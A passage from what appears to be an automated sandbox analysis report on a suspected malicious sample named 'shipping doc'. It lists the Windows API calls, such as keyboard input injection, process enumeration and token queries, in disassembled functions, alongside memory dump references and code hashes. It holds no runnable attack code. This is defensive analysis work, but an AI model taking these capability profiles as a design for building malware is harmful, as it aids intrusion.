                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$socket
                                                                                              • String ID:
                                                                                              • API String ID: 1881357543-0
                                                                                              • Opcode ID: 595329d58ecf1d1103645e755037c3213f19149cdb3461086bcc7b7af3911221
                                                                                              • Instruction ID: f60d896edd6bcc9293443bc6398139e4ec88888b8cc037627264bc9324fe8c18
                                                                                              • Opcode Fuzzy Hash: 595329d58ecf1d1103645e755037c3213f19149cdb3461086bcc7b7af3911221
                                                                                              • Instruction Fuzzy Hash: 5141A1756002006FE720AF24D886F6977E5AB44718F58845CFA1A9F7D3D772ED418B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d9c978f4bda2c8401d38b68942f84108a7cac7a5da58cf9236bbe4a952c8b84
                                                                                              • Instruction ID: e8a208ccc0ca08c61e32c12fb30375eb36f6cc52196cd2ff3b4f5e3aca7612c0
                                                                                              • Opcode Fuzzy Hash: 3d9c978f4bda2c8401d38b68942f84108a7cac7a5da58cf9236bbe4a952c8b84
                                                                                              • Instruction Fuzzy Hash: 51410A72A04314BFD728AF78CC81BAA7BE9EB98710F10853EF142DB6C1D77199918790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00155783
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 001557A9
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001557CE
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001557FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: d490086e09c3579f09869b84c769a9068a97d1c06ce89c2348380e002869651f
                                                                                              • Instruction ID: 3cf1d266c5212b3c4a6054f91d0e64928052c1e7125f52d292fb0d9aa638a88f
                                                                                              • Opcode Fuzzy Hash: d490086e09c3579f09869b84c769a9068a97d1c06ce89c2348380e002869651f
                                                                                              • Instruction Fuzzy Hash: E9412C3A600A50DFCB11DF16C444A5EBBF2AF89321B598488EC5A6F362CB70FD45CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00106D71,00000000,00000000,001082D9,?,001082D9,?,00000001,00106D71,8BE85006,00000001,001082D9,001082D9), ref: 0011D910
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0011D999
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0011D9AB
                                                                                              • __freea.LIBCMT ref: 0011D9B4
                                                                                                • Part of subcall function 00113820: RtlAllocateHeap.NTDLL(00000000,?,001B1444,?,000FFDF5,?,?,000EA976,00000010,001B1440,000E13FC,?,000E13C6,?,000E1129), ref: 00113852
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: 2f36d4738141358dbcd6ebef1dad457d9b65708a1beb03b2e4bafc5754792e06
                                                                                              • Instruction ID: 115ab242fe8e038143bd7ff81185c72a925a7cc5099bbc0594cef8dd23d8d5d5
                                                                                              • Opcode Fuzzy Hash: 2f36d4738141358dbcd6ebef1dad457d9b65708a1beb03b2e4bafc5754792e06
                                                                                              • Instruction Fuzzy Hash: 30319C72A0020AABDB299F64EC45EEE7BA5EB41314B054178FC0496290EB35DD90CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00175352
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00175375
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00175382
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001753A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow$InvalidateMessageRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 3340791633-0
                                                                                              • Opcode ID: ce6c45ad2d499126862c7e977e4c1f624abb0722b08534687e50878440743530
                                                                                              • Instruction ID: 858212c6500a8e505b262fb1df0ae6bdca4ec259470b4ebd21ca6a96eb7eb004
                                                                                              • Opcode Fuzzy Hash: ce6c45ad2d499126862c7e977e4c1f624abb0722b08534687e50878440743530
                                                                                              • Instruction Fuzzy Hash: 5131BE34A55A08EFEB349A14CC56BE837B7BB043D0F588106FA19962F1C7F0AD80DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0014ABF1
                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 0014AC0D
                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 0014AC74
                                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0014ACC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 49c48a34c8c904703a34dfff215fdab511ce2f7b0b7950f985750f2d94fe54ce
                                                                                              • Instruction ID: a7b3c720be6527f851be4707420248fe386f143b7b66c59f361eb6fbd18df831
                                                                                              • Opcode Fuzzy Hash: 49c48a34c8c904703a34dfff215fdab511ce2f7b0b7950f985750f2d94fe54ce
                                                                                              • Instruction Fuzzy Hash: F0313730A803186FEF34CB648C84BFA7BB5AF89310F85431AE485972F0C37599818792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ClientToScreen.USER32(?,?), ref: 0017769A
                                                                                              • GetWindowRect.USER32(?,?), ref: 00177710
                                                                                              • PtInRect.USER32(?,?,00178B89), ref: 00177720
                                                                                              • MessageBeep.USER32(00000000), ref: 0017778C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: 32ded3f5223f2d57405b2691fb40359453ef3c4633d7c099508d672dcc43e31a
                                                                                              • Instruction ID: 0210409f10b178638f1ec456f5c36a7a252c422ff05a1d4a54ef0748f8867ed9
                                                                                              • Opcode Fuzzy Hash: 32ded3f5223f2d57405b2691fb40359453ef3c4633d7c099508d672dcc43e31a
                                                                                              • Instruction Fuzzy Hash: 43419E34605254EFDB19CF58C898EA977F5FF49318F1581A8E4189F2A1C731E981CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 001716EB
                                                                                                • Part of subcall function 00143A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00143A57
                                                                                                • Part of subcall function 00143A3D: GetCurrentThreadId.KERNEL32 ref: 00143A5E
                                                                                                • Part of subcall function 00143A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001425B3), ref: 00143A65
                                                                                              • GetCaretPos.USER32(?), ref: 001716FF
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 0017174C
                                                                                              • GetForegroundWindow.USER32 ref: 00171752
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 11d5158260d512a8e2ee9445368ea116cf4d799c68e2377427ff859eb60cb881
                                                                                              • Instruction ID: 35594f694ba107c116d355b692f0798fd1a82b54bf26a7b4cf5fadb55c960140
                                                                                              • Opcode Fuzzy Hash: 11d5158260d512a8e2ee9445368ea116cf4d799c68e2377427ff859eb60cb881
                                                                                              • Instruction Fuzzy Hash: 85315271D00149AFD704DFAAC881CEEB7F9EF58304B548069E419E7212D7319E45CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0014D501
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0014D50F
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0014D52F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0014D5DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 420147892-0
                                                                                              • Opcode ID: a6febae02476d15604bd445dca69919747350d777c853f2f38e611d034052900
                                                                                              • Instruction ID: ba5f72c2da8ccf13cb709f0a70568d8fe1ad3abfc665edeec61181e677b789dc
                                                                                              • Opcode Fuzzy Hash: a6febae02476d15604bd445dca69919747350d777c853f2f38e611d034052900
                                                                                              • Instruction Fuzzy Hash: 6331C2311083409FD304EF54D881AAFBBF8EF99344F50092DF585961B2EF719985CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000F9BB2
                                                                                              • GetCursorPos.USER32(?), ref: 00179001
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00137711,?,?,?,?,?), ref: 00179016
                                                                                              • GetCursorPos.USER32(?), ref: 0017905E
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00137711,?,?,?), ref: 00179094
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2864067406-0
                                                                                              • Opcode ID: 0b2a73add2ab6b29a5947f749f9d57ecbcdf57499a718b1c424175a6437b3d33
                                                                                              • Instruction ID: b0801613a44fe8d68c10ad9a45f19a214dc3a1c395baaf9527565cbd938763df
                                                                                              • Opcode Fuzzy Hash: 0b2a73add2ab6b29a5947f749f9d57ecbcdf57499a718b1c424175a6437b3d33
                                                                                              • Instruction Fuzzy Hash: 8B217F35610018FFDB258F94C858EFA7BF9FB89350F148159F9099B261C7319990DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(?,0017CB68), ref: 0014D2FB
                                                                                              • GetLastError.KERNEL32 ref: 0014D30A
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0014D319
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0017CB68), ref: 0014D376
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2267087916-0
                                                                                              • Opcode ID: 5fd8817b26589ee964e678f2431b8ea0a5435207c7de7bee23c26f2db039dcb5
                                                                                              • Instruction ID: fbbad839d4bd573f032db5c381f460dce77f2a7bf00b5c2d1d322dd840ad1279
                                                                                              • Opcode Fuzzy Hash: 5fd8817b26589ee964e678f2431b8ea0a5435207c7de7bee23c26f2db039dcb5
                                                                                              • Instruction Fuzzy Hash: D2219FB05092019F8B10DF28D8818AA77E4BF56364F504A5DF499D32B2DB30DD85CB93
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00141014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0014102A
                                                                                                • Part of subcall function 00141014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00141036
                                                                                                • Part of subcall function 00141014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00141045
                                                                                                • Part of subcall function 00141014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0014104C
                                                                                                • Part of subcall function 00141014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00141062
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001415BE
                                                                                              • _memcmp.LIBVCRUNTIME ref: 001415E1
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00141617
                                                                                              • HeapFree.KERNEL32(00000000), ref: 0014161E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1592001646-0
                                                                                              • Opcode ID: 2f8a23997a91c6ef5c20e70ad9060cdcc2f8b535b31ef38ade902f434235717f
                                                                                              • Instruction ID: a4927a8ce43ca1f2da34dde38ab5e4ebc84548f29e9543c0da2443abef5b23c9
                                                                                              • Opcode Fuzzy Hash: 2f8a23997a91c6ef5c20e70ad9060cdcc2f8b535b31ef38ade902f434235717f
                                                                                              • Instruction Fuzzy Hash: BA219A31E00208FFDF00DFA4C945BEEB7B8EF84354F098459E445AB261E770AA85CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0017280A
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00172824
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00172832
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00172840
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                              • String ID:
                                                                                              • API String ID: 2169480361-0
                                                                                              • Opcode ID: 4ce68cb3bdbc58d7492d9bf4de6e32aa89a6e7f4f8fcde5718d9d4e8c79690d5
                                                                                              • Instruction ID: 88bf8f6947e42c532898a6e354e60902f53ec9c7a10181b7247fd7cc3aee61f0
                                                                                              • Opcode Fuzzy Hash: 4ce68cb3bdbc58d7492d9bf4de6e32aa89a6e7f4f8fcde5718d9d4e8c79690d5
                                                                                              • Instruction Fuzzy Hash: 7C21AF31608511AFD7189B24C845FAA7BA5AF95324F14815CF42A8B6E2CB72FC83CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00148D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0014790A,?,000000FF,?,00148754,00000000,?,0000001C,?,?), ref: 00148D8C
                                                                                                • Part of subcall function 00148D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00148DB2
                                                                                                • Part of subcall function 00148D7D: lstrcmpiW.KERNEL32(00000000,?,0014790A,?,000000FF,?,00148754,00000000,?,0000001C,?,?), ref: 00148DE3
                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00148754,00000000,?,0000001C,?,?,00000000), ref: 00147923
                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00147949
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00148754,00000000,?,0000001C,?,?,00000000), ref: 00147984
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: c01e85e87291f21154e0d3c98429b1d39704bba83ea92a8ced53168f0cee15de
                                                                                              • Instruction ID: 6432c1c01889fa4db9773b94f1bb78df7751d94bad87ca68c9c3c0ebb7b0f29b
                                                                                              • Opcode Fuzzy Hash: c01e85e87291f21154e0d3c98429b1d39704bba83ea92a8ced53168f0cee15de
                                                                                              • Instruction Fuzzy Hash: AF11263A200342ABCB15AF34C844D7A77A9FF95364B40402AF906C72B4EF319841C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00177D0B
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00177D2A
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00177D42
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0015B7AD,00000000), ref: 00177D6B
                                                                                                • Part of subcall function 000F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000F9BB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID:
                                                                                              • API String ID: 847901565-0
                                                                                              • Opcode ID: 5424f9f46459e137ce1df4bbe168c46f53cf95c533605bd139ecf7357ecd151e
                                                                                              • Instruction ID: 66c9712927b126583affd501524fa5442bea2d3f404e572bf30514cd45c5d7b8
                                                                                              • Opcode Fuzzy Hash: 5424f9f46459e137ce1df4bbe168c46f53cf95c533605bd139ecf7357ecd151e
                                                                                              • Instruction Fuzzy Hash: 7C11AF31604655AFCB209FA9CC04AA63BB5BF49364F168728F83DD72F0D73199A0CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 001756BB
                                                                                              • _wcslen.LIBCMT ref: 001756CD
                                                                                              • _wcslen.LIBCMT ref: 001756D8
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00175816
                                                                                              Memory Dump Source
